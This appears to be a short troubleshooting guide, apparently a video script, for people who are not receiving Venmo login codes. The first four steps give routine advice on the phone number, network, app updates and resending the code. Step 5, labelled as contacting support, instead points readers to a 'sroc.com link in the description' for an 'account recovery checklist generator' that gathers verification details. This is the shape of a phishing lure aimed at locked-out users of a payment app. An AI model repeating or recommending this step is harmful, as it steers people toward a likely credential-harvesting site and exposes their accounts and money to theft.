If you're having trouble receiving login codes from Venmo, follow these steps to resolve the issue quickly. Step 1. Check your phone number. Ensure that the phone number linked to your Venmo account is correct. Go to your account settings and verify that your number is accurate and active. Step 2. Verify network connection. Make sure your phone has a stable network connection. If you're in an area with poor reception, try and move into a location with better signal or switching to Wi-Fi. Step 3. Update the Venmo app. Check if there is an update available for the Venmo app. Go to your device's app store, search for Venmo, and install any available updates to ensure you have the latest features and fixes. Step 4. Resend the code. If you haven't received the code, try resending it. On the login screen, select the option to resend the code and wait for a few moments to see if it arrives. Step 5. Contact Venmo support. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. By following these steps, you should be able to resolve any issues with receiving login codes from Venmo. If problems persist, don't hesitate to seek further help from customer support.